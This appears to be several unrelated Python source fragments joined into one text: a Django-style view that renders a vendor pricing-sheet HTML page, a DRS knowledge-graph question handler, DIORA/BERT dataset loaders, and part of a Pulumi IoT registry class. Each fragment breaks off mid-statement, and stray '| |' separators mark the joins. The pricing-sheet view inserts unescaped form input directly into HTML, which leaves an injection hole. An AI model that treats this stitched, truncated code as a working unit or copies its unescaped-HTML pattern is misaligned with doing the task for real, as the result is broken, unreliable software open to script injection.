def generate_html_to_pdf_vendor_product_pricing_sheet(request):
company_name = request.POST.get('company_name').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
share_capital = request.POST.get('share_capital').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
head_office_address = request.POST.get('head_office_address').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
establishment_number = request.POST.get('establishment_number').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
register_of_trade_and_companies = request.POST.get('register_of_trade_and_companies').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
main_activities = request.POST.get('main_activities').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
activity_number = request.POST.get('activity_number').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
intra_community_vat_number = request.POST.get('intra_community_vat_number').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
president = request.POST.get('president').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
registration_date = request.POST.get('registration_date').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r1c1 = request.POST.get('r1c1').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r1c2 = request.POST.get('r1c2').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r1c3 = request.POST.get('r1c3').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r1c4 = request.POST.get('r1c4').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r2c1 = request.POST.get('r2c1').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r2c2 = request.POST.get('r2c2').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r2c3 = request.POST.get('r2c3').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r2c4 = request.POST.get('r2c4').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r3c1 = request.POST.get('r3c1').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r3c2 = request.POST.get('r3c2').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r3c3 = request.POST.get('r3c3').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r3c4 = request.POST.get('r3c4').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r4c1 = request.POST.get('r4c1').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r4c2 = request.POST.get('r4c2').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r4c3 = request.POST.get('r4c3').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r4c4 = request.POST.get('r4c4').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r5c1 = request.POST.get('r5c1').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r5c2 = request.POST.get('r5c2').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r5c3 = request.POST.get('r5c3').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r5c4 = request.POST.get('r5c4').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r6c1 = request.POST.get('r6c1').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r6c2 = request.POST.get('r6c2').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r6c3 = request.POST.get('r6c3').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r6c4 = request.POST.get('r6c4').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r7c1 = request.POST.get('r7c1').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r7c2 = request.POST.get('r7c2').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r7c3 = request.POST.get('r7c3').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r7c4 = request.POST.get('r7c4').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r8c1 = request.POST.get('r8c1').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r8c2 = request.POST.get('r8c2').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r8c3 = request.POST.get('r8c3').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r8c4 = request.POST.get('r8c4').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r9c1 = request.POST.get('r9c1').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r9c2 = request.POST.get('r9c2').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r9c3 = request.POST.get('r9c3').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r9c4 = request.POST.get('r9c4').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r10c1 = request.POST.get('r10c1').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r10c2 = request.POST.get('r10c2').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r10c3 = request.POST.get('r10c3').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
r10c4 = request.POST.get('r10c4').replace('\t', ' ').replace('\n', ' ').replace('\r', ' ')
body = '<!doctype html>' + \
'<html lang="en">' + \
'<head>' + \
'<meta charset="utf-8">' + \
'<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">' + \
'<link rel="stylesheet"' + \
'href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css"' + \
'integrity="<KEY>"' + \
'crossorigin="anonymous">' + \
'<title>Vendor product pricing sheet</title>' + \
'</head>' + \
'<body>' + \
'<div class="container">' + \
'<div class="card text-center">' + \
'<div class="card-header text-center">Vendor product pricing sheet</div>' + \
'<div class="card-body">'
body += '<h6>Comapny name : ' + company_name + '</h6>' + \
'<h6>Share capital : ' + share_capital + '</h6>' + \
'<h6>Head office address : ' + head_office_address + '</h6>' + \
'<h6>Establishment number : ' + establishment_number + '</h6>' + \
'<h6>Register of Trade and Companies : ' + register_of_trade_and_companies + '</h6>' + \
'<h6>Main activities : ' + main_activities + '</h6>' + \
'<h6>Activity number : ' + activity_number + '</h6>' + \
'<h6>Intra-community VAT number : ' + intra_community_vat_number + '</h6>' + \
'<h6>President : ' + president + '</h6>' + \
'<h6>Registration date : ' + registration_date + '</h6>' + \
'<br>'
body += '<br>'
body += '<table class="table table-striped table-bordered">' + \
'<thead>' + \
'<tr>' + \
'<th scope="col">Details</th>' + \
'<th scope="col">Product</th>' + \
'<th scope="col">Quantity</th>' + \
'<th scope="col">Price per unit</th>' + \
'<th scope="col">Total</th>' + \
'</tr>' + \
'</thead>' + \
'<tbody>' + \
'<tr>' + \
'<td>1</td>' + \
'<td>' + r1c1 + '</td>' + \
'<td>' + r1c2 + '</td>' + \
'<td>' + r1c3 + '</td>' + \
'<td>' + r1c4 + '</td>' + \
'</tr>' + \
'<tr>' + \
'<td>2</td>' + \
'<td>' + r2c1 + '</td>' + \
'<td>' + r2c2 + '</td>' + \
'<td>' + r2c3 + '</td>' + \
'<td>' + r2c4 + '</td>' + \
'</tr>' + \
'<tr>' + \
'<td>3</td>' + \
'<td>' + r3c1 + '</td>' + \
'<td>' + r3c2 + '</td>' + \
'<td>' + r3c3 + '</td>' + \
'<td>' + r3c4 + '</td>' + \
'</tr>' + \
'<tr>' + \
'<td>4</td>' + \
'<td>' + r4c1 + '</td>' + \
'<td>' + r4c2 + '</td>' + \
'<td>' + r4c3 + '</td>' + \
'<td>' + r4c4 + '</td>' + \
'</tr>' + \
'<tr>' + \
'<td>5</td>' + \
'<td>' | |
number in the name is irrelevant)
propGraph = PropertyGraph(self.graphNumber)
propGraph.appendPropValue(propRefId)
propGraph.appendPropAdj(propAdjective)
propGraph.appendPropDegree(propDegree)
# Increase the graph number for auto-generation of names
self.graphNumber = self.graphNumber + 1
# If a main graph already exists, then add the new graph in to it
if self.DRSGraph.graph is not None:
self.DRSGraph.graph = networkx.algorithms.operators.binary.compose(self.DRSGraph.graph, propGraph.graph)
# if no main graph exists, this is the main graph
else:
self.DRSGraph.graph = propGraph.graph
return True
else:
outEdgesFromNode = self.DRSGraph.graph.out_edges(existingNodeWithRefId, data=True)
adjectiveNode = None
for startNode, endNode, edgeValues in outEdgesFromNode:
# If an edge has the value ItemHasName, then we want to modify the end node
if edgeValues[CONST_NODE_VALUE_KEY] == CONST_PROP_HAS_ADJECTIVE_EDGE:
# Update graph with name
adjectiveNode = endNode
if adjectiveNode is not None:
# TODO: SEE IF I CAN UPDATE THIS TO NOT USE THIS FUNCTION
self.DRSGraph.AppendValueAtSpecificNode(adjectiveNode, propAdjective)
else:
print("Error - Encountered duplicate reference for property but did not find adjective "
"node to append to")
return True
# Method used to get the name out of a "named" predicate and associate said name with the appropriate object.
def nameItem(self, predSubjRef, predDirObjRef, DRSGraph):
# Get item name out of "named(XYZ)"
itemName = predSubjRef[predSubjRef.find("(") + 1:predSubjRef.find(")")]
# Replace the name
DRSGraph.ReplaceItemNameAtSpecificNode(predDirObjRef, "\"" + itemName + "\"")
# Return graph
return DRSGraph
# CURRENTLY OPERATING UNDER ASSUMPTION THAT questions ALWAYS end with the predicate as the final piece.
# This will 100% need revised (probably just check if
# the current line is the final question line and then process the complete question at that point).
class questionSwitcher(object):
def __init__(self):
self.graphNumber = 0
self.DRSGraph = None
self.nodesWithGivenProperty = []
self.nodesWithGivenPropertyAntonym = []
self.subjectNode = None
self.objectNode = None
self.itemCount = 0
self.propertyCount = 0
self.newToOldRefIDMapping = {}
self.predicateTrue = None
self.negationActive = None
self.verbTargetGap = False
# Method to call the appropriate function based on the argument passed in
def callFunction(self, predicateType, predicateContents, DRSGraph):
# Get the name of the method
methodName = 'question_' + str(predicateType)
# Get the method itself
method = getattr(self, methodName, lambda: "Unknown predicate")
# Call the method and return its output
self.DRSGraph = DRSGraph
method(predicateContents)
def returnDRSGraph(self):
return self.DRSGraph
def question_object(self, predicateContents):
# Get object information
predicateComponents = predicateContents.split(',')
objRefId = predicateComponents[0]
objRole = predicateComponents[1]
# objClass = predicateComponents[2]
# objUnit = predicateComponents[3]
objOperator = predicateComponents[4]
objCount = predicateComponents[5].split(')')[0]
# Get item node in original instruction which this SHOULD correspond to (ignoring name for now)
DRSEquivalentNode = self.findMatchingItemNode(objRole, objOperator, objCount)
# If we don't find a node for this item, then we have encountered a lexical gap.
newNymCount = 0
if CONTROL_IDENTIFY_LEXICAL is True:
if DRSEquivalentNode is None:
print("Lexical gap encountered - a role (" + objRole + ") was introduced which is not currently in the"
" system's vocabulary.")
if CONTROL_RESOLVE_LEXICAL is True:
# TODO: Allow user to manually choose yes/no to resolve?
while DRSEquivalentNode is None and newNymCount < 3:
# No nodes "active"
newRole = requestNewTermToNymCheck(objRole)
newNymCount = newNymCount + 1
DRSEquivalentNode = self.findMatchingItemNode(newRole, objOperator, objCount)
if DRSEquivalentNode is not None:
print("Lexical gap resolved - a role given (" + newRole + ") was found associated with an"
" item in the knowledge base")
DRSEquivalentNameNode = self.findRoleNodeConnectedToItemNode(DRSEquivalentNode)
self.DRSGraph.AppendValueAtSpecificNode(DRSEquivalentNameNode, objRole)
# Replace the reference ID (from APE Webclient) to the equivalent node's reference ID (from the graph)
if self.DRSGraph.graph.has_node(DRSEquivalentNode):
DRSNodeRefID = self.DRSGraph.graph.node[DRSEquivalentNode][CONST_NODE_VALUE_KEY]
self.newToOldRefIDMapping.update({objRefId: DRSNodeRefID})
self.itemCount = self.itemCount + 1
else:
self.newToOldRefIDMapping.update({objRefId: None})
# WILL NEED TO FIND A WAY TO HANDLE NAME AND ROLE TO GET MORE ACCURATE PICTURE?
# HANDLE PROPERTIES
# TODO: Handle 4/6 component properties
# TODO: Handle degrees besides "pos"
def question_property(self, predicateContents):
# Declare lists used later
adjectiveNodes = []
antonymNodes = []
openGap = False
# Break up the predicate
predicateComponents = predicateContents.split(',')
numberOfComponents = len(predicateComponents)
# Always have first two components, others distributed based on number of components
propRefId = predicateComponents[0]
propAdjective = predicateComponents[1]
# Different cases (differing number of components) - completely unused right now, but leaving commented out
# in case of implementation
if numberOfComponents == 3:
# Only a primary object
# propDegree = predicateComponents[2].split(')')[0]
pass
elif numberOfComponents == 4:
# Primary and secondary object
# propDegree = predicateComponents[2]
# propSecObj = predicateComponents[3].split(')')[0]
pass
elif numberOfComponents == 6:
# Primary, secondary, and tertiary objects
# propSecObj = predicateComponents[2]
# propDegree = predicateComponents[3]
# propCompTarget = predicateComponents[4]
# propTertObj = predicateComponents[5].split(')')[0]
pass
else:
# invalid
raise ValueError('Too many components ?')
# INITIAL NYM TESTING - will need to extend to other predicates as well of course
# TODO: Resolve occurs before identify here - that shouldn't be the case probably
adjectiveNymList, antonymList = getNyms(propAdjective)
if CONTROL_RESOLVE_LEXICAL is True:
adjectiveNodes = self.ListOfNodesWithValueFromList(adjectiveNymList)
else:
adjectiveNodes = self.ListOfNodesWithValue(propAdjective)
if CONTROL_IDENTIFY_NEGATION is True:
antonymNodes = self.ListOfNodesWithValueFromList(antonymList)
newNymCount = 0
if CONTROL_IDENTIFY_LEXICAL is True:
if len(adjectiveNodes) < 1:
openGap = True
print("Lexical gap encountered - an adjective (" + propAdjective + ") was introduced which is not"
" currently in the system's vocabulary.")
if CONTROL_RESOLVE_LEXICAL is True:
# TODO: Allow user to manually choose yes/no to resolve?
# Should antonymNodes be counted here too?
while len(adjectiveNodes) < 1 and len(antonymNodes) < 1 and newNymCount < 3:
# No nodes "active"
newAdjective = requestNewTermToNymCheck(propAdjective)
newNymCount = newNymCount + 1
adjectiveNymList, newAntonymList = getNyms(newAdjective)
antonymNodes = self.ListOfNodesWithValueFromList(newAntonymList)
adjectiveNodes = self.ListOfNodesWithValueFromList(adjectiveNymList)
if len(adjectiveNodes) > 0:
print("Lexical gap resolved - an adjective given (" + newAdjective + ") was found in the"
" knowledge base")
if len(adjectiveNodes) > 0:
for node in adjectiveNodes:
# Add new term into adjective node in order to grow our vocabulary
if propAdjective not in self.DRSGraph.graph.node[node][CONST_NODE_VALUE_KEY]:
# TODO: SEE IF I CAN CHANGE THIS TO NOT USE THIS FUNCTION
self.DRSGraph.AppendValueAtSpecificNode(node, propAdjective)
propertyNode = self.getPropertyNodeFromAdjective(node)
self.nodesWithGivenProperty.append(propertyNode)
# MAP FOUND PROPERTY NODE'S REF ID TO THE INCOMING REF ID
if self.DRSGraph.graph.has_node(propertyNode):
DRSNodeRefID = self.DRSGraph.graph.node[propertyNode][CONST_NODE_VALUE_KEY]
self.newToOldRefIDMapping.update({propRefId: DRSNodeRefID})
self.propertyCount = self.propertyCount + 1
openGap = False
if CONTROL_IDENTIFY_NEGATION == True:
if len(antonymNodes) > 0:
print("Negation gap identified - a node has been found that contains an antonym of one of the "
"provided adjectives")
# propertyNodesWithAdjective = []
if CONTROL_RESOLVE_NEGATION == True:
for node in antonymNodes:
# print("AntonymNode", node)
propertyNode = self.getPropertyNodeFromAdjective(node)
self.nodesWithGivenPropertyAntonym.append(propertyNode)
print("Negation gap resolved - an antonym has been found in the knowledge graph")
# MAP FOUND ANTONYM NODE'S REF ID TO THE INCOMING REF ID
if self.DRSGraph.graph.has_node(propertyNode):
DRSNodeRefID = self.DRSGraph.graph.node[propertyNode][CONST_NODE_VALUE_KEY]
self.newToOldRefIDMapping.update({propRefId: DRSNodeRefID})
self.propertyCount = self.propertyCount + 1
self.negationActive = True
openGap = False
# If not adjective or antonym node found, make sure the reference ID gets removed
if (len(adjectiveNodes) == 0 and len(antonymNodes) == 0) or openGap == True:
self.newToOldRefIDMapping.update({propRefId: None})
self.propertyCount = self.propertyCount + 1
# ***********************************************************************************************************************************
# If no adjective nodes are found, then we look for antonyms
# Because of this, we are positive-biased, as if we find adjective nodes, we don't look for antonyms
# May be a better approach to look for both and, if both are found, declare a conflict rather than assume
# one way or the other?
# Slower processing time though
# ***********************************************************************************************************************************
# else:
# antonymNodes = self.ListOfNodesWithValueFromList(antonymList)
# We don't want to grow the vocabulary here directly, so we skip the adding new terms
# if (len(antonymNodes) > 0):
# propertyNodesWithAdjective = []
# for node in antonymNodes:
# print("AntonymNode", node)
# if(propAdjective not in self.DRSGraph.graph.node[node]['value']):
# self.DRSGraph.AppendValueAtSpecificNode(node, propAdjective)
# propertyNode = self.getPropertyNodeFromAdjective(node)
# #print("propertyNode", propertyNode)
# self.nodesWithGivenPropertyAntonym.append(propertyNode)
# For predicate() predicates
# HOW TO HANDLE SENTENCE SUB-ORDINATION?
def question_predicate(self, predicateContents):
# Intransitive verbs: (predName, verb, subjectRef)
# - The SubjectRef Verbed (the man laughed, the target appears)
# Transitive verbs: (predName, verb, subjectRef, dirObjRef)
# - The Subjectref Verbed the dirObjRef (the task A has a group of objects H,
# the subject L remembers the letter I)
# Ditransitive verbs: (predName, verb, subjRef, dirObjRef, indirObjRef)
# - The SubjectRef verbed the DirObjRef to the indirObjRef (The professor (S) gave
# | |
from collections import deque
import torch
import pickle
import numpy as np
from tqdm import tqdm
from diora.data.reading import NLIReader, PlainTextReader, ConllReader, JSONLReader, PartItTextReader, PartItWholeTextReader
from diora.data.batch_iterator import BatchIterator
from diora.data.bert_batch_iterator import BERTBatchIterator
from diora.data.embeddings import EmbeddingsReader, UNK_TOKEN
from diora.data.preprocessing import indexify, build_text_vocab
from diora.data.preprocessing import synthesize_training_data
from diora.logging.configuration import get_logger
from diora.blocks.negative_sampler import NegativeSampler, calculate_freq_dist
# MAX_SUBTKS = 50
class Vocabulary(object):
def __init__(self):
self.word2idx = {}
self.idx2word = {}
self.idx = 0
def add_word(self, word):
if word not in self.word2idx:
self.word2idx[word] = self.idx
self.idx2word[self.idx] = word
self.idx += 1
def __call__(self, word):
if word not in self.word2idx:
return self.word2idx['<unk>']
return self.word2idx[word]
def __len__(self):
return len(self.word2idx)
class ConsolidateDatasets(object):
"""
A class for consolidating many datasets.
"""
def __init__(self, datasets):
# a list of dataset
self.datasets = datasets
def reindex(self, sentences, inverse_mapping):
def fn(s):
for idx in s:
yield inverse_mapping[idx]
def queue(lst):
q = deque(lst)
while len(q) > 0:
yield q.popleft()
return [list(fn(s)) for s in tqdm(queue(sentences), desc='reindex')]
def remap_embeddings(self, datasets, inverse_mapping_lst, master_word2idx):
size = datasets[0]['embeddings'].shape[1]
embeddings = np.zeros((len(master_word2idx), size), dtype=np.float32)
for dset, old2master in zip(datasets, inverse_mapping_lst):
idx_from, idx_to = zip(*old2master.items())
embeddings[np.asarray(idx_to)] = dset['embeddings'][np.asarray(idx_from)]
return embeddings
def consolidate_word2idx(self, word2idx_lst):
master_word2idx = {}
inverse_mapping_lst = []
for w2i in word2idx_lst:
old2master = {}
for w, idx in w2i.items():
if w not in master_word2idx:
master_word2idx[w] = len(master_word2idx)
old2master[idx] = master_word2idx[w]
inverse_mapping_lst.append(old2master)
return master_word2idx, inverse_mapping_lst
def run(self):
# combine two data inforamtion such as [word2idx]
word2idx_lst = [x['word2idx'] for x in self.datasets]
master_word2idx, inverse_mapping_lst = self.consolidate_word2idx(word2idx_lst)
embeddings = self.remap_embeddings(self.datasets, inverse_mapping_lst, master_word2idx)
for dset, inverse_mapping in zip(self.datasets, inverse_mapping_lst):
dset['sentences'] = self.reindex(dset['sentences'], inverse_mapping)
dset['word2idx'] = master_word2idx
dset['embeddings'] = embeddings
class ReaderManager(object):
def __init__(self, reader):
super(ReaderManager, self).__init__()
self.reader = reader
self.logger = get_logger()
def run(self, options, text_path, embeddings_path):
reader = self.reader
logger = self.logger
logger.info('Reading text: {}'.format(text_path))
reader_result = reader.read(text_path)
sentences = reader_result['sentences']
# print('the first sent: ', sentences[0])
# print('len: ', len(sentences))
extra = reader_result['extra']
# print('len extra: ', len(extra))
metadata = reader_result.get('metadata', {})
logger.info('len(sentences)={}'.format(len(sentences)))
if options.word2idx is not None:
# load the word2idx
with open(options.word2idx, 'rb') as r:
word2idx = pickle.load(r)
word2idx = word2idx.word2idx
else:
word2idx = build_text_vocab(sentences)
logger.info('len(vocab)={}'.format(len(word2idx)))
embeddings = None
if options.emb != 'bert':
if 'embeddings' in metadata:
logger.info('Using embeddings from metadata.')
embeddings = metadata['embeddings']
del metadata['embeddings']
else:
logger.info('Reading embeddings.')
embeddings, word2idx = EmbeddingsReader().get_embeddings(
options, embeddings_path, word2idx)
# idx2word = {v:k for k, v in word2idx.items()}
# print('unk tk: ', word2idx['<unk>'])
# print('unk idx: ', idx2word[0])
unk_index = word2idx.get(UNK_TOKEN, 0)
logger.info('Converting tokens to indexes (unk_index={}).'.format(unk_index))
sentences = indexify(sentences, word2idx, unk_index)
return {
"sentences": sentences,
"embeddings": embeddings,
"word2idx": word2idx,
"extra": extra,
"metadata": metadata,
}
class ReconstructDataset(object):
def initialize(self, options, text_path=None, embeddings_path=None, filter_length=0, data_type=None):
if data_type == 'nli':
reader = NLIReader.build(lowercase=options.lowercase, filter_length=filter_length)
elif data_type == 'conll_jsonl':
reader = ConllReader(lowercase=options.lowercase, filter_length=filter_length)
elif data_type == 'txt':
reader = PlainTextReader(lowercase=options.lowercase, filter_length=filter_length, include_id=False)
elif data_type == 'txt_id':
reader = PlainTextReader(lowercase=options.lowercase, filter_length=filter_length, include_id=True)
elif data_type == 'jsonl':
reader = JSONLReader(lowercase=options.lowercase, filter_length=filter_length)
elif data_type == 'synthetic':
reader = SyntheticReader(nexamples=options.synthetic_nexamples,
embedding_size=options.synthetic_embeddingsize,
vocab_size=options.synthetic_vocabsize, seed=options.synthetic_seed,
minlen=options.synthetic_minlen, maxlen=options.synthetic_maxlen,
length=options.synthetic_length)
elif data_type == 'partit':
reader = PartItTextReader(lowercase=options.lowercase, filter_length=filter_length)
elif data_type == 'partitwhole':
reader = PartItWholeTextReader(lowercase=options.lowercase, filter_length=filter_length)
manager = ReaderManager(reader)
result = manager.run(options, text_path, embeddings_path)
return result
def generate_inputs_subwords(sent, tokenizer, mask=True):
# check the overall length first
len_sent = len(sent)
sent_join = ' '.join(sent)
inputs = tokenizer(sent_join, return_tensors='pt')
inputs['labels'] = inputs.input_ids.detach().clone()
tks_len = len(inputs.input_ids[0].tolist())
tokens = []
tokens_mask = []
start_pos = 1
end_pos = start_pos
for word in sent:
word_tokens = tokenizer.tokenize(word)
tk_len = len(word_tokens)
end_pos = start_pos + tk_len
tk_mask = [0. for _ in range(tks_len)]
tk_mask[start_pos:end_pos] = [1./tk_len for _ in range(tk_len)]
start_pos = end_pos
tokens_mask.append(tk_mask)
assert end_pos == tks_len-1, 'The last position should be the same as the sentence length.'
# print('len(tokens_mask): ', len(tokens_mask))
# padding the mask
padding_num = tks_len - 2 - len(tokens_mask)
# # print('padding_num: ', padding_num)
assert padding_num >= 0, 'The length of masks should be fewer than the filter length.'
for i in range(padding_num):
tokens_mask.append([0. for _ in range (tks_len)])
inputs['token_mask'] = torch.FloatTensor(tokens_mask)
# get the labels
inputs['labels'] = inputs.input_ids.detach().clone()
if mask:
# generate the mask
rand = torch.rand(inputs.input_ids.shape)
mask_arr = (rand < 0.15) * (inputs.input_ids != 101) * (inputs.input_ids != 102)
selection = torch.flatten((mask_arr[0].nonzero())).tolist()
inputs.input_ids[0, selection] = 103
# length of input
no_mask = set(range(len(inputs.input_ids))) - set(selection)
inputs['labels'][0, list(no_mask)] = -100
return inputs
def generate_inputs(sent, tokenizer):
len_sent = len(sent)
sent_join = ' '.join(sent)
inputs = tokenizer(sent_join, return_tensors='pt')
inputs['labels'] = inputs.input_ids.detach().clone()
# generate the mask
rand = torch.rand(inputs.input_ids.shape)
mask_arr = (rand < 0.15) * (inputs.input_ids != 101) * (inputs.input_ids != 102)
selection = torch.flatten((mask_arr[0]).nonzero()).tolist()
inputs.input_ids[0, selection] = 103
# length of inputs
no_mask = set(range(len(inputs.input_ids))) - set(selection)
inputs['labels'][0, list(no_mask)] = -100
# x = sent
# y = tokenizer.convert_ids_to_tokens(inputs['input_ids'][0].tolist())
# if len(x) != len(y):
# print(sent_join)
# print(x)
# print(y)
# assert len(sent) == len(inputs['labels']), 'All tokens should be inside'
return inputs
def generate_inputs_worigin(sent, tokenizer, sent_tks, mask=True):
# check the overall length
word_len = len(sent_tks)
assume_word_len = word_len + 14
len_sent = len(sent)
sent_join = ' '.join(sent)
inputs = tokenizer(sent_join, return_tensors='pt')
inputs['labels'] = inputs.input_ids.detach().clone()
tks_len = len(inputs.input_ids[0].tolist())
assert tks_len <= assume_word_len, 'The assumed word length {} is shorter than Bert tks_len {}, sent: {}'.format(assume_word_len, tks_len, sent_join)
addition_tks_len = assume_word_len - tks_len
tokens = []
tokens_mask = []
start_pos = 1
end_pos = start_pos
for word in sent:
word_tokens = tokenizer.tokenize(word)
tk_len = len(word_tokens)
end_pos = start_pos + tk_len
tk_mask = [0. for _ in range(assume_word_len)]
tk_mask[start_pos:end_pos] = [1./tk_len for _ in range(tk_len)]
start_pos = end_pos
tokens_mask.append(tk_mask)
assert end_pos == tks_len-1, 'The last position should be the same as the sentence length.'
# origin_len x input_tk_len
inputs['token_mask'] = torch.FloatTensor(tokens_mask)
if mask:
# generate the mask
rand = torch.rand(inputs.input_ids.shape)
mask_arr = (rand < 0.15) * (inputs.input_ids != 101) * (inputs.input_ids != 102)
selection = torch.flatten((mask_arr[0].nonzero())).tolist()
inputs.input_ids[0, selection] = 103
no_mask = set(range(len(inputs.input_ids)))
inputs['labels'][0, list(no_mask)] = -100
# padding to
inputs['input_ids'] = torch.LongTensor(inputs['input_ids'][0].tolist() + [0 for _ in range(addition_tks_len)]).unsqueeze(0)
inputs['token_type_ids'] = torch.LongTensor(inputs['token_type_ids'][0].tolist() + [0 for _ in range(addition_tks_len)]).unsqueeze(0)
inputs['attention_mask'] = torch.LongTensor(inputs['attention_mask'][0].tolist() + [0 for _ in range(addition_tks_len)]).unsqueeze(0)
inputs['labels'] = torch.LongTensor(inputs['labels'][0].tolist() + [-100 for _ in range(addition_tks_len)]).unsqueeze(0)
# add seq
inputs['origin_input_ids'] = torch.LongTensor(sent_tks).unsqueeze(0)
inputs['sents'] = sent
return inputs
class MLMDataset(object):
def initialize(self, options, tokenizer, model, text_path, filter_length):
if options.data_type == 'partitwhole':
reader = PartItWholeTextReader(lowercase=options.lowercase, filter_length=filter_length)
elif options.data_type == 'partit':
reader = PartItTextReader(lowercase=options.lowercase, filter_length=filter_length)
else:
raise Exception("Bert only for partitwhole datatype.")
# {'sentence': [list of string]}
reader_result = reader.read(text_path)
sentences = reader_result['sentences']
extra = reader_result['extra']
metadata = reader_result.get('metadata', {})
# read the wordidx
if options.word2idx is not None:
# load the word2idx
with open(options.word2idx, 'rb') as r:
word2idx = pickle.load(r)
word2idx = word2idx.word2idx
# check all words in word2idx
word_set = set([x for l in sentences for x in l])
print('There is {} oov words'.format(len(word_set - set(word2idx.keys()))))
# check the new words outside the tokenizer and put them in
tokenizer_vocab = tokenizer.vocab
new_vocab = []
vocab_add_cnt = 0
for word in list(word_set):
if word not in tokenizer_vocab:
print(word)
new_vocab.append(word)
vocab_add_cnt += 1
print('The number of added vocab cnt is {}'.format(vocab_add_cnt))
if len(new_vocab) != 0:
tokenizer.add_tokens(new_vocab)
# add new words to model
model.resize_token_embeddings(len(tokenizer))
# generate
dataset = [
generate_inputs(sen, tokenizer) for sen in sentences
]
return {
'sentences': dataset,
'word2idx': word2idx,
'extra': extra,
'metadata': metadata,
}
class BERTDataset(object):
def initialize(self, options, tokenizer, model, text_path, filter_length):
if options.data_type == 'partitwhole':
reader = PartItWholeTextReader(lowercase=options.lowercase, filter_length=filter_length)
elif options.data_type == 'partit':
reader = PartItTextReader(lowercase=options.lowercase, filter_length=filter_length)
else:
raise Exception("Bert only for partitwhole datatype.")
# {'sentence': [list of string]}
reader_result = reader.read(text_path)
sentences = reader_result['sentences']
extra = reader_result['extra']
metadata = reader_result.get('metadata', {})
# read the wordidx
if options.word2idx is not None:
# load the word2idx
with open(options.word2idx, 'rb') as r:
word2idx = pickle.load(r)
word2idx = word2idx.word2idx
# check all words in word2idx
word_set = set([x for l in sentences for x in l])
print('There is {} oov words'.format(len(word_set - set(word2idx.keys()))))
# generate
dataset = [
generate_inputs_subwords(sent, tokenizer, options.mask) for sent in sentences
]
return {
'sentences': dataset,
'word2idx': word2idx,
'extra': extra,
'metadata': | |
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
"""
The region in which the created registry should reside.
If it is not provided, the provider region is used.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region", value)
@property
@pulumi.getter(name="stateNotificationConfig")
def state_notification_config(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
A PubSub topic to publish device state updates.
The structure is documented below.
"""
return pulumi.get(self, "state_notification_config")
@state_notification_config.setter
def state_notification_config(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "state_notification_config", value)
class Registry(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
credentials: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RegistryCredentialArgs']]]]] = None,
event_notification_configs: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RegistryEventNotificationConfigItemArgs']]]]] = None,
http_config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
log_level: Optional[pulumi.Input[str]] = None,
mqtt_config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
